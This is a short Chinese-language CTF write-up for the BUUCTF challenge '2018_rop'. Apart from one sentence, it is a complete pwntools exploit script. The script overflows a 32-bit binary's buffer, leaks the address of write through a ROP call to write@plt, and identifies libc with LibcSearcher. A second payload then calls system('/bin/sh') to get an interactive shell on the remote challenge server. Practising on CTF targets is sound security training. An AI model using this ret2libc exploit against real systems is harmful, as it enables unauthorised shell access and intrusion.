常规的32位泄漏libc,比较蛋痛的是我常规的写法不知道为什么出错,以后要多注意recv到的东西
exp:
from pwn import *
from LibcSearcher import *
local_file = './2018_rop'
local_libc = './libc.so.6'
remote_libc = './libc.so.6'
select = 1
if select == 0:
r = process(local_file)
#libc = ELF(local_libc)
else:
r = remote('node3.buuoj.cn', 26332)
#libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se = lambda data :r.send(data)
sa = lambda delim,data :r.sendafter(delim, data)
sl = lambda data :r.sendline(data)
sla = lambda delim,data :r.sendlineafter(delim, data)
sea = lambda delim,data :r.sendafter(delim, data)
rc = lambda numb=4096 :r.recv(numb)
rl = lambda :r.recvline()
ru = lambda delims, drop=True :r.recvuntil(delims, drop)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
info_addr = lambda tag, addr :r.info(tag + ': {:#x}'.format(addr))
def debug(cmd=''):
gdb.attach(r,cmd)
write_got = elf.got['write']
write_plt = elf.plt['write']
main = elf.sym['main']
p1 = flat(['a'*0x88, 'b'*4, write_plt, main, 1, write_got, 4])
se(p1)
#write_addr = uu32(ru('\xf7')[-4:])
write_addr = uu32(rc())
log.info(hex(write_addr))
libc = LibcSearcher('write', write_addr)
libcbase = write_addr - libc.dump('write')
system_addr = libcbase + libc.dump('system')
binsh_addr = libcbase + libc.dump('str_bin_sh')
p2 = flat(['a'*0x88, 'b'*4, system_addr, 0, binsh_addr])
se(p2)
r.interactive()